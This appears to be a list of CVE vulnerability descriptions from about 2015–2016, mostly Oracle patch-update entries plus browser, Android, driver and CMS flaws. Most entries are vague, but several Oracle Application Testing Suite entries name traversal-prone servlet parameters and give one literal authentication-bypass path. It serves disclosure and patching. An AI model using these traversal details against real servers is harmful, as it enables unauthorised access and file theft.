Unspecified vulnerability in the Oracle E-Business Intelligence component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Business Views Catalog.
Unspecified vulnerability in the Oracle Internet Expenses component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect integrity via unknown vectors related to AP Web Utilities.
Unspecified vulnerability in the Oracle iLearning component in Oracle iLearning 6.0 and 6.1 allows remote attackers to affect integrity via unknown vectors related to Learner Administration.
Unspecified vulnerability in the Oracle iReceivables component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect integrity via unknown vectors related to AR Web Utilities, a different vulnerability than CVE-2016-0519.
Unspecified vulnerability in the Oracle Retail Order Management System Cloud Service component in Oracle Retail Applications 3.5, 4.5, 4.7, 5.0, and 15.0 allows remote attackers to affect confidentiality via unknown vectors related to Order Entry.
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to Options.
Unspecified vulnerability in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
Unspecified vulnerability in the Oracle Retail Order Broker Cloud Service component in Oracle Retail Applications 4.0 and 4.1 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to System Administration.
Unspecified vulnerability in the Java VM component in Oracle Database Server 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-4794.
Unspecified vulnerability in the Oracle Agile Engineering Data Management component in Oracle Supply Chain Products Suite 6.1.2.2, 6.1.3.0, and 6.2.0.0 allows local users to affect confidentiality via unknown vectors related to Install.
Unspecified vulnerability in the Oracle Agile Engineering Data Management component in Oracle Supply Chain Products Suite 6.1.2.2, 6.1.3.0, and 6.2.0.0 allows remote attackers to affect integrity via unknown vectors related to Web Client.
Unspecified vulnerability in the MICROS CWDirect component in Oracle Retail Applications 12.5, 13.0, 14.0, 15.0, 16.0, 17.0, and 18.0 allows remote attackers to affect confidentiality via unknown vectors related to Order Entry.
Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox before 4.3.36 and 5.0.14 allows remote attackers to affect availability via unknown vectors related to Core.
Unspecified vulnerability in the Java SE and Java SE Embedded components in Oracle Java SE 6u105, 7u91, and 8u66 and Java SE Embedded 8u65 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
Unspecified vulnerability in Oracle Sun Solaris 11 allows local users to affect integrity and availability via unknown vectors related to Kernel Cryptography.
Unspecified vulnerability in the Oracle Application Testing Suite component in Oracle Enterprise Manager Grid Control 12.4.0.2 and 12.5.0.2 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Load Testing for Web Apps, a different vulnerability than CVE-2016-0488.  NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that this is a directory traversal vulnerability in the isAllowedUrl function, which allows remote attackers to bypass authentication via directory traversal sequences following a URI entry that does not require authentication, as demonstrated by olt/Login.do/../../olt/UploadFileUpload.do.
Unspecified vulnerability in the Oracle Application Testing Suite component in Oracle Enterprise Manager Grid Control 12.4.0.2 and 12.5.0.2 allows remote attackers to affect integrity and availability via unknown vectors related to Load Testing for Web Apps.  NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that the UploadFileAction servlet allows remote authenticated users to upload and execute arbitrary files via an * (asterisk) character in the fileType parameter.
Unspecified vulnerability in the Oracle Application Testing Suite component in Oracle Enterprise Manager Grid Control 12.4.0.2 and 12.5.0.2 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Test Manager for Web Apps, a different vulnerability than CVE-2016-0487.  NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that this is a directory traversal vulnerability in the UploadServlet servlet, which allows remote attackers to upload and execute arbitrary files via directory traversal sequences in a filename header.
Unspecified vulnerability in the Oracle Application Testing Suite component in Oracle Enterprise Manager Grid Control 12.4.0.2 and 12.5.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Test Manager for Web Apps.  NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that this is a directory traversal vulnerability in the ActionServlet servlet, which allows remote authenticated users to upload and execute arbitrary files via directory traversal sequences in the tempfilename parameter in a ReportImage action.
Unspecified vulnerability in the Oracle Application Testing Suite component in Oracle Enterprise Manager Grid Control 12.4.0.2 and 12.5.0.2 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Load Testing for Web Apps, a different vulnerability than CVE-2016-0492.  NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that this is a directory traversal vulnerability in the isAllowedUrl function in the admin pages, which allows remote attackers to bypass authentication and gain administrator access via directory traversal sequences following a URI entry that does not require authentication.
Unspecified vulnerability in the Oracle Application Testing Suite component in Oracle Enterprise Manager Grid Control 12.4.0.2 and 12.5.0.2 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Test Manager for Web Apps, a different vulnerability than CVE-2016-0490.  NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that this is a directory traversal vulnerability in the process method in the ActionServlet servlet, which allows remote attackers to bypass authentication via directory traversal sequences following an unspecified URI string.
Unspecified vulnerability in the Oracle Application Testing Suite component in Oracle Enterprise Manager Grid Control 12.4.0.2 and 12.5.0.2 allows remote attackers to affect confidentiality via unknown vectors related to Test Manager for Web Apps, a different vulnerability than CVE-2016-0480, CVE-2016-0481, CVE-2016-0482, and CVE-2016-0485.  NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that this is a directory traversal vulnerability in the DownloadServlet servlet, which allows remote attackers to read arbitrary files via directory traversal sequences in the exportFileName parameter.
Unspecified vulnerability in the Oracle Application Testing Suite component in Oracle Enterprise Manager Grid Control 12.4.0.2 and 12.5.0.2 allows remote attackers to affect confidentiality via unknown vectors related to Test Manager for Web Apps, a different vulnerability than CVE-2016-0480, CVE-2016-0481, CVE-2016-0482, and CVE-2016-0486.  NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that this is a directory traversal vulnerability in the DownloadServlet servlet, which allows remote attackers to read arbitrary files via directory traversal sequences in the reportName parameter.
Unspecified vulnerability in the Oracle Application Testing Suite component in Oracle Enterprise Manager Grid Control 12.4.0.2 and 12.5.0.2 allows remote attackers to affect confidentiality via unknown vectors related to Test Manager for Web Apps.  NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that this is a directory traversal vulnerability in the DownloadServlet servlet, which allows remote attackers to read arbitrary files via directory traversal sequences in the scriptPath parameter.
Unspecified vulnerability in the Oracle Application Testing Suite component in Oracle Enterprise Manager Grid Control 12.4.0.2 and 12.5.0.2 allows remote attackers to affect confidentiality via unknown vectors related to Test Manager for Web Apps, a different vulnerability than CVE-2016-0480, CVE-2016-0481, CVE-2016-0485, and CVE-2016-0486.  NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that this is a directory traversal vulnerability in the DownloadServlet servlet, which allows remote attackers to read arbitrary files via directory traversal sequences in the file parameter.
Unspecified vulnerability in the Oracle Application Testing Suite component in Oracle Enterprise Manager Grid Control 12.4.0.2 and 12.5.0.2 allows remote attackers to affect confidentiality via unknown vectors related to Test Manager for Web Apps, a different vulnerability than CVE-2016-0480, CVE-2016-0482, CVE-2016-0485, and CVE-2016-0486.  NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that this is a directory traversal vulnerability in the DownloadServlet servlet, which allows remote attackers to read arbitrary files via directory traversal sequences in the scheduleReportName parameter.
Unspecified vulnerability in the Oracle Application Testing Suite component in Oracle Enterprise Manager Grid Control 12.4.0.2 and 12.5.0.2 allows remote attackers to affect confidentiality via unknown vectors related to Test Manager for Web Apps, a different vulnerability than CVE-2016-0481, CVE-2016-0482, CVE-2016-0485, and CVE-2016-0486.  NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that this is a directory traversal vulnerability in the DownloadServlet servlet, which allows remote attackers to read arbitrary files via directory traversal sequences in the TMAPReportImage parameter.
Unspecified vulnerability in the Oracle Application Testing Suite component in Oracle Enterprise Manager Grid Control 12.4.0.2 and 12.5.0.2 allows remote attackers to affect confidentiality via unknown vectors related to Load Testing for Web Apps, a different vulnerability than CVE-2016-0476 and CVE-2016-0477.  NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that this is a directory traversal vulnerability in the DownloadServlet servlet, which allows remote attackers to read arbitrary files via directory traversal sequences in the scriptName parameter.
Unspecified vulnerability in the Oracle Application Testing Suite component in Oracle Enterprise Manager Grid Control 12.4.0.2 and 12.5.0.2 allows remote attackers to affect confidentiality via unknown vectors related to Load Testing for Web Apps, a different vulnerability than CVE-2016-0476 and CVE-2016-0478.  NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that this is a directory traversal vulnerability in the DownloadServlet servlet, which allows remote attackers to read arbitrary files via directory traversal sequences in the (1) repository, (2) workspace, or (3) scenario parameter.
Unspecified vulnerability in the Oracle Application Testing Suite component in Oracle Enterprise Manager Grid Control 12.4.0.2 and 12.5.0.2 allows remote attackers to affect confidentiality via unknown vectors related to Load Testing for Web Apps, a different vulnerability than CVE-2016-0477 and CVE-2016-0478.  NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that this is a directory traversal vulnerability in the DownloadServlet servlet, which allows remote attackers to read arbitrary files via directory traversal sequences in the reportName parameter.
Unspecified vulnerability in the Java SE, Java SE Embedded, and JRockit components in Oracle Java SE 8u66; Java SE Embedded 8u65; and JRockit R28.3.8 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Libraries.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.54 and 8.55 allows remote authenticated users to affect integrity via unknown vectors related to Fluid Core.
Unspecified vulnerability in the XDB - XML Database component in Oracle Database Server 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality and availability via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.53 and 8.54 allows remote attackers to affect confidentiality via unknown vectors related to Multichannel Framework.
Unspecified vulnerability in the Oracle BI Publisher component in Oracle Fusion Middleware 11.1.1.7.0, 11.1.1.9.0, and 12.2.1.0.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to BI Publisher Security.
Unspecified vulnerability in the Security component in Oracle Database Server 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Systems Products Suite 3.3 and 4 allows local users to affect availability via unknown vectors related to Resource Group Manager.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.53, 8.54, and 8.55 allows remote attackers to affect confidentiality via unknown vectors related to Portal.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.53 and 8.54 allows remote authenticated users to affect confidentiality via unknown vectors related to Multichannel Framework, a different vulnerability than CVE-2015-2650.
Unspecified vulnerability in the XDB - XML Database component in Oracle Database Server 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect availability via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.55 allows remote attackers to affect integrity via unknown vectors related to Fluid Homepage and NavBar.
Unspecified vulnerability in the Oracle Applications Framework component in Oracle E-Business Suite 11.5.10.2, 12.1.3, 12.2.3, 12.2.4, and 12.2.5 allows remote authenticated users to affect integrity via unknown vectors related to Popup Windows.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control 11.1.0.1, 11.2.0.4, 12.1.0.4, and 12.1.0.5 allows local users to affect confidentiality and availability via unknown vectors related to Agent Next Gen.
Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 3.1.2 allows remote attackers to affect integrity via unknown vectors related to Embedded Server.
Unspecified vulnerability in the Oracle GoldenGate component in Oracle GoldenGate 11.2 and 12.1.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2016-0451.
Unspecified vulnerability in the Oracle GoldenGate component in Oracle GoldenGate 11.2 and 12.1.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2016-0452.
Unspecified vulnerability in the Oracle GoldenGate component in Oracle GoldenGate 11.2 and 12.1.2 allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control 11.1.0.1, 11.2.0.4, 12.1.0.4, and 12.1.0.5 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Agent Next Gen, a different vulnerability than CVE-2016-0444 and CVE-2016-0447.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control 11.1.0.1, 11.2.0.4, 12.1.0.4, and 12.1.0.5 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Agent Next Gen, a different vulnerability than CVE-2016-0444 and CVE-2016-0449.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control 11.1.0.1, 11.2.0.4, 12.1.0.4, and 12.1.0.5 allows local users to affect confidentiality via unknown vectors related to Agent Next Gen.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control 11.1.0.1, 11.2.0.4, 12.1.0.4, and 12.1.0.5 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Agent Next Gen.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control 11.1.0.1, 11.2.0.4, 12.1.0.4, and 12.1.0.5 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Agent Next Gen, a different vulnerability than CVE-2016-0447 and CVE-2016-0449.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control 11.1.0.1, 12.1.0.4, and 12.1.0.5 allows remote attackers to affect confidentiality via unknown vectors related to Agent Next Gen.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control 12.1.0.4 and 12.1.0.5 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Loader Service.
Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 3.1.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Embedded Server.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.5.0, 8.5.1, and 8.5.2 allows local users to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2015-4808, CVE-2015-6013, CVE-2015-6014, and CVE-2015-6015.
Unspecified vulnerability in Oracle Sun Solaris 11 allows local users to affect availability via unknown vectors related to Solaris Kernel Zones, a different vulnerability than CVE-2016-0419.
Unspecified vulnerability in the Oracle BI Publisher component in Oracle Fusion Middleware 11.1.1.7.0 and 11.1.1.9.0 allows remote attackers to affect integrity via unknown vectors related to Scheduler, a different vulnerability than CVE-2016-0401.
Unspecified vulnerability in Oracle Sun Solaris 11 allows local users to affect availability via unknown vectors related to Verified Boot.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control 11.1.0.1, 11.2.0.4, 12.1.0.4, and 12.1.0.5 allows remote authenticated users to affect confidentiality via unknown vectors related to UI Framework.
Unspecified vulnerability in Oracle Sun Solaris 11 allows local users to affect confidentiality and availability via unknown vectors related to Solaris Kernel Zones.
Unspecified vulnerability in the JD Edwards EnterpriseOne Tools component in Oracle JD Edwards Products 9.1 and 9.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Monitoring and Diagnostics.
Unspecified vulnerability in the JD Edwards EnterpriseOne Tools component in Oracle JD Edwards Products 9.1 and 9.2 allows remote attackers to affect availability via unknown vectors related to Monitoring and Diagnostics.
Unspecified vulnerability in Oracle Sun Solaris 11 allows local users to affect availability via unknown vectors related to Solaris Kernel Zones, a different vulnerability than CVE-2016-0431.
Unspecified vulnerability in Oracle Sun Solaris 11 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Solaris Kernel Zones, a different vulnerability than CVE-2016-0414.
Unspecified vulnerability in Oracle Sun Solaris 11 allows remote attackers to affect integrity via unknown vectors related to System Archive Utility.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control 11.1.0.1, 12.1.0.4, and 12.1.0.5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to UI Framework.
Unspecified vulnerability in Oracle Sun Solaris 11 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Solaris Kernel Zones, a different vulnerability than CVE-2016-0418.
Unspecified vulnerability in the PeopleSoft Enterprise SCM eProcurement component in Oracle PeopleSoft Products 9.1 and 9.2 allows remote authenticated users to affect integrity via unknown vectors related to Manage Requisition Status.
Unspecified vulnerability in the Java SE and Java SE Embedded components in Oracle Java SE 6u105, 7u91, and 8u66 and Java SE Embedded 8u65 allows remote attackers to affect integrity via unknown vectors related to Networking.
Unspecified vulnerability in the Oracle BI Publisher component in Oracle Fusion Middleware 11.1.1.7.0 and 11.1.1.9.0 allows remote attackers to affect integrity via unknown vectors related to Scheduler, a different vulnerability than CVE-2016-0429.
Cross-site request forgery (CSRF) vulnerability in IBM Security Identity Manager (ISIM) Virtual Appliance 7.0.0.0 through 7.0.1.0 before 7.0.1-ISS-SIM-FP0001 allows remote attackers to hijack the authentication of users for requests that have unspecified impact via unknown vectors. IBM X-Force ID: 111736.
Use-after-free vulnerability in the opj_j2k_write_mco function in j2k.c in OpenJPEG before 2.1.1 allows remote attackers to have unspecified impact via unknown vectors.
The ecc_256_modq function in ecc-256.c in Nettle before 3.2 does not properly handle carry propagation and produces incorrect output in its implementation of the P-256 NIST elliptic curve, which allows attackers to have unspecified impact via unknown vectors, a different vulnerability than CVE-2015-8803.
x86_64/ecc-384-modp.asm in Nettle before 3.2 does not properly handle carry propagation and produces incorrect output in its implementation of the P-384 NIST elliptic curve, which allows attackers to have unspecified impact via unknown vectors.
The ecc_256_modp function in ecc-256.c in Nettle before 3.2 does not properly handle carry propagation and produces incorrect output in its implementation of the P-256 NIST elliptic curve, which allows attackers to have unspecified impact via unknown vectors, a different vulnerability than CVE-2015-8805.
Multiple cross-site scripting (XSS) vulnerabilities in unspecified frontend components in TYPO3 6.2.x before 6.2.16 and 7.x before 7.6.1 allow remote authenticated editors to inject arbitrary web script or HTML via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in unspecified backend components in TYPO3 6.2.x before 6.2.16 and 7.x before 7.6.1 allow remote authenticated editors to inject arbitrary web script or HTML via unknown vectors.
The dissct_rsl_ipaccess_msg function in epan/dissectors/packet-rsl.c in the RSL dissector in Wireshark 1.12.x before 1.12.9 and 2.0.x before 2.0.1 does not reject unknown TLV types, which allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted packet.
The idle stream handling in nghttp2 before 1.6.0 allows attackers to have unspecified impact via unknown vectors, aka a heap-use-after-free bug.
The SysAdminWebTool servlets in SAP Mobile Platform allow remote attackers to bypass authentication and obtain sensitive information, gain privileges, or have unspecified other impact via unknown vectors, aka SAP Security Note 2227855.
Directory traversal vulnerability in Joomla! 3.2.0 through 3.3.x and 3.4.x before 3.4.6 allows remote attackers to have unspecified impact via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in the com_templates component in Joomla! 3.2.0 through 3.3.x and 3.4.x before 3.4.6 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Multiple unspecified vulnerabilities in Google V8 before 4.7.80.23, as used in Google Chrome before 47.0.2526.80, allow attackers to cause a denial of service or possibly have other impact via unknown vectors, a different issue than CVE-2015-8478.
Multiple unspecified vulnerabilities in Google V8 before 4.7.80.23, as used in Google Chrome before 47.0.2526.73, allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified services in Atlassian Bamboo before 5.9.9 and 5.10.x before 5.10.0 do not require authentication, which allows remote attackers to obtain sensitive information, modify settings, or manage build agents via unknown vectors involving the JMS port.
Xen 4.6.x and earlier does not properly enforce limits on page order inputs for the (1) XENMEM_increase_reservation, (2) XENMEM_populate_physmap, (3) XENMEM_exchange, and possibly other HYPERVISOR_memory_op suboperations, which allows ARM guest OS administrators to cause a denial of service (CPU consumption, guest reboot, or watchdog timeout and host reboot) and possibly have unspecified other impact via unknown vectors.
Unspecified vulnerability in the NVAPI support layer in the NVIDIA GPU graphics driver R340 before 341.92, R352 before 354.35, and R358 before 358.87 on Windows allows local users to obtain sensitive information, cause a denial of service (crash), or possibly gain privileges via unknown vectors.  NOTE: this identifier was SPLIT from CVE-2015-7869 per ADT2 and ADT3 due to different vulnerability types and affected versions.
Cross-site request forgery (CSRF) vulnerability in Elasticsearch Kibana before 4.1.3 and 4.2.x before 4.2.1 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
An unspecified module in Huawei eSpace U1910, U1911, U1930, U1960, U1980, and U1981 unified gateways with software before V200R003C00SPC300 does not properly initialize memory when processing timeout messages, which allows remote attackers to cause a denial of service (out-of-bounds memory access and device restart) via unknown vectors.
mediaserver in Android before 5.1.1 LMY48X allows remote attackers to obtain sensitive information, and consequently bypass an unspecified protection mechanism, via unknown vectors, aka internal bugs 23540907 and 23515142, a different vulnerability than CVE-2015-6611.
The Adobe Premiere Clip app before 1.2.1 for iOS mishandles unspecified input, which has unknown impact and attack vectors.
Unitronics VisiLogic OPLC IDE before 9.8.02 allows remote attackers to execute unspecified code via unknown vectors.
Multiple integer overflows in the kernel mode driver for the NVIDIA GPU graphics driver R340 before 341.92, R352 before 354.35, and R358 before 358.87 on Windows and R304 before 304.131, R340 before 340.96, R352 before 352.63, and R358 before 358.16 on Linux allow local users to obtain sensitive information, cause a denial of service (crash), or possibly gain privileges via unknown vectors, which trigger uninitialized or out of bounds memory access.  NOTE: this identifier has been SPLIT per ADT2 and ADT3 due to different vulnerability type and affected versions. See CVE-2015-8328 for the vulnerability in the NVAPI support layer in NVIDIA drivers for Windows.
Multiple unspecified vulnerabilities in Google V8 before 4.6.85.23, as used in Google Chrome before 46.0.2490.71, allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Double-free vulnerability in the sPLT chunk structure and png.c in pngcrush before 1.7.87 allows attackers to have unspecified impact via unknown vectors.
Multiple cross-site request forgery (CSRF) vulnerabilities in Ipswitch MOVEit Mobile 1.2.0.962 and earlier allow remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Multiple cross-site request forgery (CSRF) vulnerabilities in the Organizations page in Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.9 and earlier allow remote attackers to hijack the authentication of administrators for requests that have unspecified impact via unknown vectors.
The (1) git-remote-ext and (2) unspecified other remote helper programs in Git before 2.3.10, 2.4.x before 2.4.10, 2.5.x before 2.5.4, and 2.6.x before 2.6.1 do not properly restrict the allowed protocols, which might allow remote attackers to execute arbitrary code via a URL in a (a) .gitmodules file or (b) unknown other sources in a submodule.
Unspecified vulnerability in GSKit on IBM MQ M2000 appliances before 8.0.0.4 allows remote attackers to obtain sensitive information via unknown vectors, a different vulnerability than CVE-2015-7420.
Unspecified vulnerability in GSKit on IBM MQ M2000 appliances before 8.0.0.4 allows remote attackers to obtain sensitive information via unknown vectors, a different vulnerability than CVE-2015-7421.
Multiple cross-site request forgery (CSRF) vulnerabilities in Revive Adserver before 3.2.2 allow remote attackers to hijack the authentication of users for requests that (1) perform certain plugin actions and possibly cause a denial of service (disabled core plugins) via unknown vectors or (2) change the contact name and language or possibly have unspecified other impact via a crafted POST request to an account-user-*.php script.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 43.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 43.0 and Firefox ESR 38.x before 38.5 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
The ReadbackResultWriterD3D11::Run function in Mozilla Firefox before 41.0 and Firefox ESR 38.x before 38.3 misinterprets the return value of a function call, which might allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via unknown vectors.
The InitTextures function in Mozilla Firefox before 41.0 and Firefox ESR 38.x before 38.3 might allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via unknown vectors.
The AnimationThread function in Mozilla Firefox before 41.0 and Firefox ESR 38.x before 38.3 uses an incorrect argument to the sscanf function, which might allow remote attackers to cause a denial of service (stack-based buffer overflow and application crash) or possibly have unspecified other impact via unknown vectors.
The XULContentSinkImpl::AddText function in Mozilla Firefox before 41.0 and Firefox ESR 38.x before 38.3 might allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via unknown vectors, related to an "overflow."
The nsAttrAndChildArray::GrowBy function in Mozilla Firefox before 41.0 and Firefox ESR 38.x before 38.3 might allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via unknown vectors, related to an "overflow."
Multiple unspecified vulnerabilities in Git before 2.5.4, as used in Apple Xcode before 7.2, have unknown impact and attack vectors.  NOTE: this CVE is associated only with Xcode use cases.
The Web Service component in Apple OS X Server before 5.0.15 omits an unspecified HTTP header configuration, which allows remote attackers to bypass intended access restrictions via unknown vectors.
The kernel in Apple iOS before 9.1 and OS X before 10.11.1 does not initialize an unspecified data structure, which allows remote attackers to execute arbitrary code via vectors involving an unknown network-connectivity requirement.
Unspecified vulnerability in Virtual Table Server (VTS) in HP LoadRunner 11.52, 12.00, 12.01, 12.02, and 12.50 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-3138.
PgBouncer 1.6.x before 1.6.1, when configured with auth_user, allows remote attackers to gain login access as auth_user via an unknown username.
Multiple unspecified vulnerabilities in Google Chrome before 47.0.2526.80 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 47.0.2526.73 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 46.0.2490.71 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
The kernel in Android before 5.1.1 LMY49F and 6.0 before 2016-01-01 allows attackers to obtain sensitive information, and consequently bypass an unspecified protection mechanism, via unknown vectors, as demonstrated by obtaining Signature or SignatureOrSystem access, aka internal bug 24157888.
libstagefright in Android before 5.1.1 LMY48Z and 6.0 before 2015-12-01 allows remote attackers to obtain sensitive information, and consequently bypass an unspecified protection mechanism, via unknown vectors, as demonstrated by obtaining Signature or SignatureOrSystem access, aka internal bug 24346430.
libstagefright in Android before 5.1.1 LMY48Z and 6.0 before 2015-12-01 allows remote attackers to obtain sensitive information, and consequently bypass an unspecified protection mechanism, via unknown vectors, as demonstrated by obtaining Signature or SignatureOrSystem access, aka internal bug 24623447.
Media Framework in Android before 5.1.1 LMY48Z and 6.0 before 2015-12-01 allows attackers to obtain sensitive information, and consequently bypass an unspecified protection mechanism, via unknown vectors, as demonstrated by obtaining Signature or SignatureOrSystem access, aka internal bug 24074485.
libstagefright in Android before 5.1.1 LMY48Z and 6.0 before 2015-12-01 allows remote attackers to obtain sensitive information, and consequently bypass an unspecified protection mechanism, via unknown vectors, as demonstrated by obtaining Signature or SignatureOrSystem access, aka internal bug 24310423.
The Native Frameworks Library in Android before 5.1.1 LMY48Z and 6.0 before 2015-12-01 allows attackers to obtain sensitive information, and consequently bypass an unspecified protection mechanism, via unknown vectors, as demonstrated by obtaining Signature or SignatureOrSystem access, aka internal bug 23905002.
mediaserver in Android before 5.1.1 LMY48X and 6.0 before 2015-11-01 allows remote attackers to obtain sensitive information, and consequently bypass an unspecified protection mechanism, via unknown vectors, aka internal bugs 23905951, 23912202, 23953967, 23696300, 23600291, 23756261, 23541506, 23284974, 23542351, and 23542352, a different vulnerability than CVE-2015-8074.
Multiple unspecified vulnerabilities in Google V8 before 4.5.103.29, as used in Google Chrome before 45.0.2454.85, allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
The hdbsql client 1.00.091.00 Build 1418659308-1530 in SAP HANA allows local users to cause a denial of service (memory corruption) and possibly have unspecified other impact via unknown vectors, aka SAP Security Note 2140700.
Cross-site request forgery (CSRF) vulnerability in Infinite Automation Mango Automation 2.5.x and 2.6.x through 2.6.0 build 430 allows remote authenticated users to hijack the authentication of unspecified victims via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in Resource Data Management Data Manager before 2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
The (1) Service Provider (SP) and (2) Identity Provider (IdP) in PicketLink before 2.7.0 does not ensure that the Destination attribute in a Response element in a SAML assertion matches the location from which the message was received, which allows remote attackers to have unspecified impact via unknown vectors.  NOTE: this identifier was SPLIT from CVE-2015-0277 per ADT2 due to different vulnerability types.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.5.0, 8.5.1, and 8.5.2 allows local users to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2015-4808, CVE-2015-6013, CVE-2015-6014, and CVE-2016-0432.  NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that this issue is a stack-based buffer overflow in Oracle Outside In 8.5.2 and earlier, which allows remote attackers to execute arbitrary code via a crafted Paradox DB file.
